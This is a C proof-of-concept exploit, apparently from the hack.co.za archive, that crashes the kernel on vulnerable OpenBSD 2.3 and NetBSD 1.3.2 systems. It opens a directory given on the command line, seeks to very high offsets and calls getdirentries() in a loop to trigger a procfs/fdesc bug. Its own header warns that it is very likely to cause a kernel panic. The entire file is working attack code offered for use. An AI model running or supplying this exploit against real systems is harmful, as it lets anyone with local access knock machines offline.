/*
 *               procfs/fdesc
 *       OpenBSD 2.3 and NetBSD 1.3.2.
 *
 *
 * Here's example code that tries getdirentries()
 * calls on directories after lseek()ing to high
 * offsets. 
 * (warning: if your system is vulnerable this is
 *           very likely to cause a kernel panic)
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <dirent.h>


main(int argc, char *argv[])
{
  int dirfd;
  unsigned long basep;
  unsigned long hmm;
  char buf[2048];

  if(argc < 2)
    {
      fprintf(stderr, "usage: %s directory\n", argv[0]);
      exit(1);
    }

  if((dirfd = open(argv[1], O_RDONLY)) == -1)
    {
      perror("open");
      exit(1);
    }

  for(hmm = 0xf0000000; hmm <= 0xffffffff; hmm+=1)
    {
      if(lseek(dirfd, hmm, SEEK_SET) == -1)
        {
          perror("lseek");
          exit(1);
        }

      /* address won't effectively change, but index
       * variable used as a test will be very large
       * kernel's loop should continue and break
       * something
 [2000]*/

      if(getdirentries(dirfd, buf, 2048, &basep) == -1)
        {
          perror("getdirentries");
          exit(1);
        }
    }
  exit(0);
}
/*                    www.hack.co.za              [2000]*/